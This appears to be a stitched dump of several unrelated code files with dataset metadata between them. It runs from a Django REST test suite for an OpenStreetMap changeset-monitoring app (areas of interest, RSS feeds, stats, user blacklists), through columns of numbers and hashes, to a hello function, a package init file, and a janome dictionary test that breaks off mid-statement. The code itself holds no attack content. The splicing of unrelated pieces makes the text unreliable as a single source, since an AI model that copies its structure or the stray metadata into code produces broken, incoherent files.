self.assertEqual(response.status_code, 401)
def test_retrieve_detail_authenticated(self):
self.client.login(username=self.user.username, password='password')
response = self.client.get(
reverse('supervise:aoi-detail', args=[self.aoi.pk])
)
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.data['properties']['name'],
'Best place in the world'
)
self.assertEqual(
response.data['properties']['filters'],
{
'editor': 'Potlatch 2',
'harmful': 'False',
'users': 'test',
'uids': '234,43',
'checked_by': 'qa_user',
'geometry': self.m_polygon.geojson
}
)
self.assertEqual(
response.data['geometry']['type'],
'MultiPolygon'
)
self.assertIn(
'id',
response.data.keys()
)
self.assertNotIn(
'user',
response.data.keys()
)
self.assertEqual(
response.data['properties']['changesets_url'],
reverse('supervise:aoi-list-changesets', args=[self.aoi.pk])
)
def test_update_aoi_unauthenticated(self):
"""Unauthenticated users can not update AoI"""
response = self.client.put(
reverse('supervise:aoi-detail', args=[self.aoi.pk]),
self.data
)
self.assertEqual(response.status_code, 401)
self.aoi.refresh_from_db()
self.assertEqual(self.aoi.name, 'Best place in the world')
response = self.client.patch(
reverse('supervise:aoi-detail', args=[self.aoi.pk]),
self.data
)
self.assertEqual(response.status_code, 401)
self.aoi.refresh_from_db()
self.assertEqual(self.aoi.name, 'Best place in the world')
def test_delete_aoi_unauthenticated(self):
"""Unauthenticated users can not delete AoI"""
response = self.client.delete(
reverse('supervise:aoi-detail', args=[self.aoi.pk])
)
self.assertEqual(response.status_code, 401)
self.assertEqual(AreaOfInterest.objects.count(), 1)
def test_update_aoi_of_another_user(self):
"""A user can not update AoI of another user."""
user = User.objects.create_user(
username='test_2',
email='c@a.com',
password='password'
)
self.client.login(username=user.username, password='password')
response = self.client.put(
reverse('supervise:aoi-detail', args=[self.aoi.pk]),
self.data
)
self.assertEqual(response.status_code, 403)
self.aoi.refresh_from_db()
self.assertEqual(self.aoi.name, 'Best place in the world')
response = self.client.patch(
reverse('supervise:aoi-detail', args=[self.aoi.pk]),
self.data
)
self.assertEqual(response.status_code, 403)
self.aoi.refresh_from_db()
self.assertEqual(self.aoi.name, 'Best place in the world')
def test_delete_aoi_of_another_user(self):
"""A user can not delete AoI of another user."""
user = User.objects.create_user(
username='test_2',
email='c@a.com',
password='password'
)
self.client.login(username=user.username, password='password')
response = self.client.delete(
reverse('supervise:aoi-detail', args=[self.aoi.pk])
)
self.assertEqual(response.status_code, 403)
self.assertEqual(AreaOfInterest.objects.count(), 1)
def test_update_with_aoi_owner_user(self):
"""User can update his/her AoI"""
self.client.login(username=self.user.username, password='password')
response = self.client.put(
reverse('supervise:aoi-detail', args=[self.aoi.pk]),
self.data
)
self.assertEqual(response.status_code, 200)
self.aoi.refresh_from_db()
self.assertEqual(self.aoi.name, 'Golfo da Guiné')
self.assertEqual(self.aoi.filters, self.data.get('filters'))
self.assertTrue(
self.aoi.geometry.intersects(
Polygon(((4, 0), (5, 0), (5, 1), (4, 0)))
)
)
def test_put_update_with_bbox(self):
"""'in_bbox' field must populate the geometry field with a Polygon"""
data = {
'filters': {
'is_suspect': 'True',
'in_bbox': '4,0,5,1'
},
'name': 'Golfo da Guiné'
}
self.client.login(username=self.user.username, password='password')
response = self.client.put(
reverse('supervise:aoi-detail', args=[self.aoi.pk]),
data
)
self.assertEqual(response.status_code, 200)
self.aoi.refresh_from_db()
self.assertEqual(self.aoi.name, 'Golfo da Guiné')
self.assertEqual(self.aoi.filters, data.get('filters'))
self.assertTrue(
self.aoi.geometry.intersects(
Polygon(((4, 0), (5, 0), (5, 1), (4, 0)))
)
)
self.assertIsInstance(self.aoi.geometry, Polygon)
def test_put_empty_geometry(self):
"""If the AoI receives a filter without geometry and in_bbox information,
the geometry field will be updated to None."""
data = {
'filters': {
'is_suspect': 'True',
},
'name': 'Golfo da Guiné'
}
self.client.login(username=self.user.username, password='password')
response = self.client.put(
reverse('supervise:aoi-detail', args=[self.aoi.pk]),
data
)
self.assertEqual(response.status_code, 200)
self.aoi.refresh_from_db()
self.assertEqual(self.aoi.name, 'Golfo da Guiné')
self.assertEqual(self.aoi.filters, data.get('filters'))
self.assertIsNone(self.aoi.geometry)
def test_patch_empty_geometry(self):
"""If the AoI receives a filter without geometry and in_bbox information,
the geometry field will be updated to None."""
data = {
'filters': {
'is_suspect': 'True',
},
'name': 'Golfo da Guiné'
}
self.client.login(username=self.user.username, password='password')
response = self.client.patch(
reverse('supervise:aoi-detail', args=[self.aoi.pk]),
data
)
self.assertEqual(response.status_code, 200)
self.aoi.refresh_from_db()
self.assertEqual(self.aoi.name, 'Golfo da Guiné')
self.assertEqual(self.aoi.filters, data.get('filters'))
self.assertIsNone(self.aoi.geometry)
def test_patch_update_with_bbox(self):
"""'in_bbox' field must populate the geometry field with a Polygon"""
data = {
'filters': {
'is_suspect': 'True',
'in_bbox': '4,0,5,1'
}
}
self.client.login(username=self.user.username, password='password')
response = self.client.patch(
reverse('supervise:aoi-detail', args=[self.aoi.pk]),
data
)
self.assertEqual(response.status_code, 200)
self.aoi.refresh_from_db()
self.assertEqual(self.aoi.filters, data.get('filters'))
self.assertIsInstance(self.aoi.geometry, Polygon)
self.assertTrue(
self.aoi.geometry.intersects(
Polygon(((4, 0), (5, 0), (5, 1), (4, 0)))
)
)
def test_update_with_line_and_point(self):
"""The geometry field must receive any geometry type."""
point = Point((0.5, 0.5))
data = {
'filters': {
'geometry': point.geojson,
},
'name': 'Golfo da Guiné'
}
self.client.login(username=self.user.username, password='password')
response = self.client.put(
reverse('supervise:aoi-detail', args=[self.aoi.pk]),
data
)
self.assertEqual(response.status_code, 200)
self.aoi.refresh_from_db()
self.assertIsInstance(self.aoi.geometry, Point)
line = LineString(((0.5, 0.5), (1, 1)))
data = {
'filters': {
'geometry': line.geojson,
},
'name': 'Golfo da Guiné'
}
response = self.client.put(
reverse('supervise:aoi-detail', args=[self.aoi.pk]),
data
)
self.assertEqual(response.status_code, 200)
self.aoi.refresh_from_db()
self.assertIsInstance(self.aoi.geometry, LineString)
def test_validation(self):
self.client.login(username=self.user.username, password='password')
response = self.client.put(
reverse('supervise:aoi-detail', args=[self.aoi.pk]),
self.data
)
self.assertEqual(response.status_code, 200)
# validate if the user are not allowed to let the filters and geometry fields empty
response = self.client.put(
reverse('supervise:aoi-detail', args=[self.aoi.pk]),
{'name': 'Golfo da Guiné'}
)
self.assertEqual(response.status_code, 400)
self.aoi.refresh_from_db()
self.assertIsNotNone(self.aoi.filters)
self.assertIsNotNone(self.aoi.geometry)
def test_delete_with_aoi_owner_user(self):
self.client.login(username=self.user.username, password='password')
response = self.client.delete(
reverse('supervise:aoi-detail', args=[self.aoi.pk])
)
self.assertEqual(response.status_code, 204)
self.assertEqual(AreaOfInterest.objects.count(), 0)
class TestAoIChangesetListView(APITestCase):
def setUp(self):
self.m_polygon = MultiPolygon(
Polygon(((0, 0), (0, 1), (1, 1), (0, 0))),
Polygon(((1, 1), (1, 2), (2, 2), (1, 1)))
)
self.user = User.objects.create_user(
username='test_user',
email='b@a.com',
password='password'
)
UserSocialAuth.objects.create(
user=self.user,
provider='openstreetmap',
uid='123123',
)
self.aoi = AreaOfInterest.objects.create(
name='Best place in the world',
user=self.user,
geometry=self.m_polygon,
filters={
'editor': 'Potlatch 2',
'harmful': 'False',
'geometry': self.m_polygon.geojson
},
)
def test_authenticated_aoi_list_changesets_view(self):
ChangesetFactory(bbox=Polygon(((10, 10), (10, 11), (11, 11), (10, 10))))
ChangesetFactory(
editor='JOSM 1.5',
harmful=False,
bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
)
ChangesetFactory.create_batch(
51,
harmful=False,
bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
)
self.client.login(username=self.user.username, password='password')
response = self.client.get(
reverse('supervise:aoi-list-changesets', args=[self.aoi.pk])
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['count'], 51)
self.assertEqual(len(response.data['features']), 50)
self.assertIn('features', response.data.keys())
self.assertIn('geometry', response.data['features'][0].keys())
self.assertIn('properties', response.data['features'][0].keys())
self.assertIn('check_user', response.data['features'][0]['properties'])
self.assertIn('user', response.data['features'][0]['properties'])
self.assertIn('uid', response.data['features'][0]['properties'])
def test_unauthenticated_aoi_list_changesets_view(self):
response = self.client.get(
reverse('supervise:aoi-list-changesets', args=[self.aoi.pk])
)
self.assertEqual(response.status_code, 401)
def test_aoi_with_in_bbox_filter(self):
aoi_with_in_bbox = AreaOfInterest.objects.create(
name='Another place in the world',
user=self.user,
geometry=Polygon(((0, 0), (0, 2), (2, 2), (2, 0), (0, 0))),
filters={
'editor': 'Potlatch 2',
'harmful': 'False',
'in_bbox': '0,0,2,2'
},
)
ChangesetFactory(
harmful=False,
bbox=Polygon(((10, 10), (10, 11), (11, 11), (10, 10)))
)
ChangesetFactory(
editor='JOSM 1.5',
harmful=False,
bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
)
ChangesetFactory.create_batch(
51,
harmful=False,
bbox=Polygon(((10, 10), (10, 10.5), (10.7, 10.5), (10, 10))),
)
ChangesetFactory.create_batch(
51,
harmful=False,
bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
)
self.client.login(username=self.user.username, password='password')
response = self.client.get(
reverse('supervise:aoi-list-changesets', args=[aoi_with_in_bbox.pk])
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['count'], 51)
self.assertEqual(len(response.data['features']), 50)
def test_aoi_with_hide_whitelist_filter(self):
aoi = AreaOfInterest.objects.create(
name='Another place in the world',
user=self.user,
filters={
'editor': 'Potlatch 2',
'hide_whitelist': 'True'
},
)
UserWhitelistFactory(user=self.user, whitelist_user='test')
ChangesetFactory()
ChangesetFactory(user='other_user', uid='333')
ChangesetFactory(user='another_user', uid='4333')
self.client.login(username=self.user.username, password='password')
response = self.client.get(
reverse('supervise:aoi-list-changesets', args=[aoi.pk])
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['count'], 2)
self.assertEqual(len(response.data['features']), 2)
def test_aoi_with_false_hide_whitelist_filter(self):
aoi = AreaOfInterest.objects.create(
name='Another place in the world',
user=self.user,
filters={
'editor': 'Potlatch 2',
'hide_whitelist': 'False'
},
)
UserWhitelistFactory(user=self.user, whitelist_user='test')
ChangesetFactory()
ChangesetFactory(user='other_user', uid='333')
ChangesetFactory(user='another_user', uid='4333')
self.client.login(username=self.user.username, password='password')
response = self.client.get(
reverse('supervise:aoi-list-changesets', args=[aoi.pk])
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['count'], 3)
self.assertEqual(len(response.data['features']), 3)
def test_aoi_with_blacklist_filter(self):
aoi = AreaOfInterest.objects.create(
name='Another place in the world',
user=self.user,
filters={
'editor': 'Potlatch 2',
'blacklist': 'True'
},
)
BlacklistedUser.objects.create(
username='test',
uid='123123',
added_by=self.user,
)
ChangesetFactory()
ChangesetFactory(user='other_user', uid='333')
ChangesetFactory(user='another_user', uid='4333')
self.client.login(username=self.user.username, password='password')
response = self.client.get(
reverse('supervise:aoi-list-changesets', args=[aoi.pk])
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['count'], 1)
self.assertEqual(len(response.data['features']), 1)
def test_aoi_with_false_blacklist_filter(self):
aoi = AreaOfInterest.objects.create(
name='Another place in the world',
user=self.user,
filters={
'editor': 'Potlatch 2',
'blacklist': 'False'
},
)
BlacklistedUser.objects.create(
username='test',
uid='123123',
added_by=self.user,
)
ChangesetFactory()
ChangesetFactory(user='other_user', uid='333')
ChangesetFactory(user='another_user', uid='4333')
self.client.login(username=self.user.username, password='password')
response = self.client.get(
reverse('supervise:aoi-list-changesets', args=[aoi.pk])
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['count'], 3)
self.assertEqual(len(response.data['features']), 3)
def test_aoi_changesets_feed_view(self):
ChangesetFactory(bbox=Polygon(((10, 10), (10, 11), (11, 11), (10, 10))))
ChangesetFactory(
editor='JOSM 1.5',
harmful=False,
bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
)
GoodChangesetFactory.create_batch(
51,
comment='Test case',
user='çãoéí',
bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
)
self.client.login(username=self.user.username, password='password')
response = self.client.get(
reverse('supervise:aoi-changesets-feed', args=[self.aoi.pk])
)
self.assertEqual(response.status_code, 200)
rss_data = ET.fromstring(response.content).getchildren()[0].getchildren()
title = [i for i in rss_data if i.tag == 'title'][0]
items = [i for i in rss_data if i.tag == 'item']
self.assertEqual(
title.text,
'Changesets of Area of Interest {} by {}'.format(
self.aoi.name, self.aoi.user.username
)
)
self.assertEqual(len(items), 50)
def test_feed_view_of_unnamed_aoi_and_zero_changesets(self):
ChangesetFactory(bbox=Polygon(((10, 10), (10, 11), (11, 11), (10, 10))))
HarmfulChangesetFactory(
editor='JOSM 1.5',
bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
)
self.aoi.name = ''
self.aoi.filters = {
'editor': 'JOSM 1.5',
'harmful': 'True',
'in_bbox': '0,0,2,2'
}
self.aoi.save()
self.client.login(username=self.user.username, password='password')
response = self.client.get(
reverse('supervise:aoi-changesets-feed', args=[self.aoi.pk])
)
self.assertEqual(response.status_code, 200)
rss_data = ET.fromstring(response.content).getchildren()[0].getchildren()
title = [i for i in rss_data if i.tag == 'title'][0]
items = [i for i in rss_data if i.tag == 'item']
self.assertEqual(
title.text,
'Changesets of Area of Interest Unnamed by {}'.format(
self.aoi.user.username
)
)
self.assertEqual(len(items), 1)
class TestAoIStatsAPIViews(APITestCase):
def setUp(self):
self.m_polygon = MultiPolygon(
Polygon(((0, 0), (0, 1), (1, 1), (0, 0))),
Polygon(((1, 1), (1, 2), (2, 2), (1, 1)))
)
self.user = User.objects.create_user(
username='test_user',
email='b@a.com',
password='password',
is_staff=True
)
UserSocialAuth.objects.create(
user=self.user,
provider='openstreetmap',
uid='123123',
)
self.aoi = AreaOfInterest.objects.create(
name='Best place in the world',
user=self.user,
geometry=self.m_polygon,
filters={
'editor': 'Potlatch 2',
'harmful': 'False',
'geometry': self.m_polygon.geojson
},
)
ChangesetFactory(bbox=Polygon(((10, 10), (10, 11), (11, 11), (10, 10))))
HarmfulChangesetFactory(
editor='JOSM 1.5',
bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
)
self.good_changesets = GoodChangesetFactory.create_batch(
51,
bbox=Polygon(((0, 0), (0, 0.5), (0.7, 0.5), (0, 0))),
)
self.reason = SuspicionReasonsFactory(name='possible import')
self.reason_2 = SuspicionReasonsFactory(
name='Mass Deletion', is_visible=False)
self.reason.changesets.set(self.good_changesets[0:5])
self.reason_2.changesets.set(self.good_changesets[5:10])
self.tag_1 = TagFactory(name='Vandalism')
self.tag_2 = TagFactory(name='Big buildings', is_visible=False)
self.tag_1.changesets.set(self.good_changesets[0:5])
self.tag_2.changesets.set(self.good_changesets[5:10])
self.url = reverse('supervise:aoi-stats', args=[self.aoi.pk])
def test_stats_unauthenticated(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data.get('checked_changesets'), 51)
self.assertEqual(response.data.get('harmful_changesets'), 0)
self.assertEqual(response.data.get('users_with_harmful_changesets'), 0)
self.assertEqual(len(response.data.get('reasons')), 1)
self.assertEqual(len(response.data.get('tags')), 1)
possible_import = {
'name': 'possible import',
'changesets': 5,
'checked_changesets': 5,
'harmful_changesets': 0
}
self.assertIn(possible_import, response.data.get('reasons'))
vandalism = {
'name': 'Vandalism',
'changesets': 5,
'checked_changesets': 5,
'harmful_changesets': 0
}
self.assertIn(vandalism, response.data.get('tags'))
def test_stats_with_staff_user(self):
self.client.login(username=self.user.username, password='password')
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data.get('checked_changesets'), 51)
self.assertEqual(response.data.get('harmful_changesets'), 0)
self.assertEqual(response.data.get('users_with_harmful_changesets'), 0)
self.assertEqual(len(response.data.get('reasons')), 2)
self.assertEqual(len(response.data.get('tags')), 2)
possible_import = {
'name': 'possible import',
'changesets': 5,
'checked_changesets': 5,
'harmful_changesets': 0
}
self.assertIn(possible_import, response.data.get('reasons'))
vandalism = {
'name': 'Vandalism',
'changesets': 5,
'checked_changesets': 5,
'harmful_changesets': 0
}
self.assertIn(vandalism, response.data.get('tags'))
mass_deletion = {
'name': 'Mass Deletion',
'changesets': 5,
'checked_changesets': 5,
'harmful_changesets': 0
}
self.assertIn(mass_deletion, response.data.get('reasons'))
big_buildings = {
'name': 'Big buildings',
'changesets': 5,
'checked_changesets': 5,
'harmful_changesets': 0
}
self.assertIn(big_buildings, response.data.get('tags'))
class TestBlacklistedUserListAPIView(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
username='test_user',
email='b@a.com',
password='password'
)
UserSocialAuth.objects.create(
user=self.user,
provider='openstreetmap',
uid='123123',
)
self.staff_user = User.objects.create_user(
username='staff_user',
email='b@a.com',
password='password',
is_staff=True
)
UserSocialAuth.objects.create(
user=self.staff_user,
provider='openstreetmap',
uid='999898',
)
BlacklistedUser.objects.create(
username='Bad User',
uid='3434',
added_by=self.staff_user,
)
BlacklistedUser.objects.create(
username='Vandal',
uid='3435',
added_by=self.staff_user,
)
BlacklistedUser.objects.create(
username='New bad user',
uid='9888',
added_by=self.user,
)
self.url = reverse('supervise:blacklist-list-create')
def test_list_view_unauthenticated(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, 401)
def test_list_view_normal_user(self):
self.client.login(username=self.user.username, password='password')
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data.get('results')), 1)
def test_list_view_staff_user(self):
self.client.login(username=self.staff_user.username, password='password')
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data.get('results')), 2)
class TestBlacklistedUserCreateAPIView(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
username='test_user',
email='b@a.com',
password='password'
)
UserSocialAuth.objects.create(
user=self.user,
provider='openstreetmap',
uid='123123',
)
self.staff_user = User.objects.create_user(
username='staff_user',
email='b@a.com',
password='password',
is_staff=True
)
UserSocialAuth.objects.create(
user=self.staff_user,
provider='openstreetmap',
uid='999898',
)
self.url = reverse('supervise:blacklist-list-create')
self.data = {'username': 'Bad User', 'uid': '3434'}
def test_create_view_unauthenticated(self):
response = self.client.post(self.url, self.data)
self.assertEqual(response.status_code, 401)
self.assertEqual(BlacklistedUser.objects.count(), 0)
def test_create_view_normal_user(self):
self.client.login(username=self.user.username, password='password')
response = self.client.post(self.url, self.data)
self.assertEqual(response.status_code, 201)
self.assertEqual(BlacklistedUser.objects.count(), 1)
def test_create_view_staff_user(self):
self.client.login(username=self.staff_user.username, password='password')
response = self.client.post(self.url, self.data)
self.assertEqual(response.status_code, 201)
self.assertEqual(BlacklistedUser.objects.count(), 1)
class TestBlacklistedUserDetailAPIViews(APITestCase):
def setUp(self):
self.user = User.objects.create_user(
username='test_user',
email='b@a.com',
password='password'
)
UserSocialAuth.objects.create(
user=self.user,
provider='openstreetmap',
uid='123123',
)
self.staff_user = User.objects.create_user(
username='staff_user',
email='b@a.com',
password='password',
is_staff=True
)
UserSocialAuth.objects.create(
user=self.staff_user,
provider='openstreetmap',
uid='999898',
)
self.blacklisted = BlacklistedUser.objects.create(
username='Bad User',
uid='3434',
added_by=self.staff_user,
)
self.blacklisted_2 = BlacklistedUser.objects.create(
username='Bad User',
uid='3434',
added_by=self.user,
)
self.url = reverse(
'supervise:blacklist-detail', args=[self.blacklisted.uid]
)
def test_unauthenticated_get(self):
response = self.client.get(self.url)
self.assertEqual(response.status_code, 401)
def test_normal_user_get(self):
self.client.login(username=self.user.username, password='password')
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data.get('username'), 'Bad User')
self.assertEqual(response.data.get('added_by'), 'test_user')
self.assertIsNotNone(response.data.get('uid'))
self.assertIn('date', response.data.keys())
def test_normal_user_getting_staff_user_blacklist(self):
blacklisted = BlacklistedUser.objects.create(
username='Bad User',
uid='4999',
added_by=self.staff_user,
)
self.client.login(username=self.user.username, password='password')
response = self.client.get(
reverse('supervise:blacklist-detail', args=[4999])
)
self.assertEqual(response.status_code, 404)
def test_staff_user_get(self):
self.client.login(username=self.staff_user.username, password='password')
response = self.client.get(self.url)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data.get('username'), 'Bad User')
self.assertEqual(response.data.get('added_by'), 'staff_user')
self.assertIsNotNone(response.data.get('uid'))
self.assertIn('date', response.data.keys())
def test_unauthenticated_delete(self):
response = self.client.delete(self.url)
self.assertEqual(response.status_code, 401)
self.assertEqual(BlacklistedUser.objects.count(), 2)
def test_normal_user_delete(self):
self.client.login(username=self.user.username, password='password')
response = self.client.delete(self.url)
self.assertEqual(response.status_code, 204)
self.assertEqual(BlacklistedUser.objects.count(), 1)
def test_staff_user_delete(self):
self.client.login(username=self.staff_user.username, password='password')
response = self.client.delete(self.url)
self.assertEqual(response.status_code, 204)
self.assertEqual(BlacklistedUser.objects.count(), 1)
def test_unauthenticated_patch(self):
response = self.client.patch(self.url, {'username': 'other_user'})
self.assertEqual(response.status_code, 401)
self.assertEqual(self.blacklisted.username, 'Bad User')
def test_normal_user_patch(self):
self.client.login(username=self.user.username, password='password')
response = self.client.patch(self.url, {'username': 'other_user'})
self.assertEqual(response.status_code, 200)
self.blacklisted_2.refresh_from_db()
self.assertEqual(self.blacklisted_2.username, 'other_user')
def test_staff_user_patch(self):
self.client.login(username=self.staff_user.username, password='password')
response = self.client.patch(self.url, {'username': 'other_user'})
self.assertEqual(response.status_code, 200)
self.blacklisted.refresh_from_db()
self.assertEqual(self.blacklisted.username, 'other_user')
| 37.854969
| 91
| 0.56733
| 4,552
| 42,284
| 5.164763
| 0.056678
| 0.08741
| 0.080221
| 0.070311
| 0.87533
| 0.848533
| 0.823139
| 0.797788
| 0.773628
| 0.746576
| 0
| 0.029542
| 0.299522
| 42,284
| 1,116
| 92
| 37.888889
| 0.764205
| 0.019771
| 0
| 0.644269
| 0
| 0
| 0.120311
| 0.012374
| 0
| 0
| 0
| 0
| 0.167984
| 1
| 0.0583
| false
| 0.05336
| 0.01581
| 0
| 0.082016
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
f7f4535f06fc137c900ae9eaa837bf15c073f00e
| 49
|
py
|
Python
|
b_hello/hello.py
|
cclai999/pytest-0706
|
1707a3b4fefee2d97a1f9fbccda80f859e2933cb
|
[
"MIT"
] | null | null | null |
b_hello/hello.py
|
cclai999/pytest-0706
|
1707a3b4fefee2d97a1f9fbccda80f859e2933cb
|
[
"MIT"
] | null | null | null |
b_hello/hello.py
|
cclai999/pytest-0706
|
1707a3b4fefee2d97a1f9fbccda80f859e2933cb
|
[
"MIT"
] | null | null | null |
def hello_name(name):
return f'Hello {name}'
| 16.333333
| 26
| 0.673469
| 8
| 49
| 4
| 0.625
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183673
| 49
| 2
| 27
| 24.5
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0.244898
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
7903133b41fa1b97b42a57086a2ea357c2af4943
| 160
|
py
|
Python
|
civet/__init__.py
|
PMKielstra/Civet
|
1731a1b1e670a082dfcbf545f3431a79d7954411
|
[
"MIT"
] | 3
|
2020-06-27T21:33:53.000Z
|
2020-07-03T07:39:46.000Z
|
civet/__init__.py
|
PMKielstra/Civet
|
1731a1b1e670a082dfcbf545f3431a79d7954411
|
[
"MIT"
] | null | null | null |
civet/__init__.py
|
PMKielstra/Civet
|
1731a1b1e670a082dfcbf545f3431a79d7954411
|
[
"MIT"
] | null | null | null |
from .civet import Civet
from .building_blocks import *
from .builtin_scenario_sources import *
from .builtin_analyzers import *
from .builtin_outputs import *
| 26.666667
| 39
| 0.81875
| 21
| 160
| 6
| 0.47619
| 0.238095
| 0.404762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 160
| 5
| 40
| 32
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
791dfad53cd2a8af5d637308ac6edd7c1c6b6ee8
| 11,624
|
py
|
Python
|
tests/test_dic.py
|
narupo/janome
|
9304d45ce8e0ed7094284d478b318c02ccbe6408
|
[
"Apache-2.0"
] | 748
|
2015-02-14T12:13:59.000Z
|
2022-03-27T23:16:47.000Z
|
tests/test_dic.py
|
narupo/janome
|
9304d45ce8e0ed7094284d478b318c02ccbe6408
|
[
"Apache-2.0"
] | 87
|
2015-04-09T02:36:14.000Z
|
2022-03-23T06:15:29.000Z
|
tests/test_dic.py
|
narupo/janome
|
9304d45ce8e0ed7094284d478b318c02ccbe6408
|
[
"Apache-2.0"
] | 66
|
2015-04-11T04:42:28.000Z
|
2022-03-27T16:14:30.000Z
|
# Copyright 2015 moco_beta
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import unittest
from janome.sysdic import all_fstdata, entries, mmap_entries, connections, chardef, unknowns
from janome.dic import (
SystemDictionary,
MMapSystemDictionary,
UserDictionary,
CompiledUserDictionary,
FILE_USER_FST_DATA,
FILE_USER_ENTRIES_DATA
)
from janome.progress import SimpleProgressIndicator, logger as p_logger
# TODO: better way to find package...
parent_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, parent_dir)
class TestDictionary(unittest.TestCase):
def test_system_dictionary_ipadic(self):
sys_dic = SystemDictionary(all_fstdata(), entries(), connections, chardef.DATA, unknowns.DATA)
self.assertEqual(7, len(sys_dic.lookup('形態素'.encode('utf-8'))))
self.assertEqual(1, sys_dic.get_trans_cost(0, 1))
self.assertEqual({'HIRAGANA': []}, sys_dic.get_char_categories('は'))
self.assertEqual({'KATAKANA': []}, sys_dic.get_char_categories('ハ'))
self.assertEqual({'KATAKANA': []}, sys_dic.get_char_categories('ハ'))
self.assertEqual({'KANJI': []}, sys_dic.get_char_categories('葉'))
self.assertEqual({'ALPHA': []}, sys_dic.get_char_categories('C'))
self.assertEqual({'ALPHA': []}, sys_dic.get_char_categories('C'))
self.assertEqual({'SYMBOL': []}, sys_dic.get_char_categories('#'))
self.assertEqual({'SYMBOL': []}, sys_dic.get_char_categories('#'))
self.assertEqual({'NUMERIC': []}, sys_dic.get_char_categories('5'))
self.assertEqual({'NUMERIC': []}, sys_dic.get_char_categories('5'))
self.assertEqual({'KANJI': [], 'KANJINUMERIC': ['KANJI']}, sys_dic.get_char_categories('五'))
self.assertEqual({'GREEK': []}, sys_dic.get_char_categories('Γ'))
self.assertEqual({'CYRILLIC': []}, sys_dic.get_char_categories('Б'))
self.assertEqual({'DEFAULT': []}, sys_dic.get_char_categories('𠮷'))
self.assertEqual({'DEFAULT': []}, sys_dic.get_char_categories('한'))
self.assertTrue(sys_dic.unknown_invoked_always('ALPHA'))
self.assertFalse(sys_dic.unknown_invoked_always('KANJI'))
self.assertTrue(sys_dic.unknown_grouping('NUMERIC'))
self.assertFalse(sys_dic.unknown_grouping('KANJI'))
self.assertEqual(2, sys_dic.unknown_length('HIRAGANA'))
def test_property_types(self):
sys_dic = SystemDictionary(all_fstdata(), entries(), connections, chardef.DATA, unknowns.DATA)
# entry in the system dictionary
entry = sys_dic.lookup('すもも'.encode('utf8'))[0]
self.assertTrue(type(entry[1]) is str)
self.assertTrue(type(entry[0]) is int)
self.assertTrue(type(entry[2]) is int)
self.assertTrue(type(entry[3]) is int)
self.assertTrue(type(entry[4]) is int)
entry_extra = sys_dic.lookup_extra(entry[0])
self.assertTrue(type(entry_extra[0]) is str)
self.assertTrue(type(entry_extra[1]) is str)
self.assertTrue(type(entry_extra[2]) is str)
self.assertTrue(type(entry_extra[3]) is str)
self.assertTrue(type(entry_extra[4]) is str)
self.assertTrue(type(entry_extra[5]) is str)
# unknown entry
entry = sys_dic.unknowns.get(u'HIRAGANA')[0]
self.assertTrue(type(entry[3]) is str)
self.assertTrue(type(entry[0]) is int)
self.assertTrue(type(entry[1]) is int)
self.assertTrue(type(entry[2]) is int)
# mmap dict etnry
mmap_dic = MMapSystemDictionary(all_fstdata(), mmap_entries(), connections, chardef.DATA, unknowns.DATA)
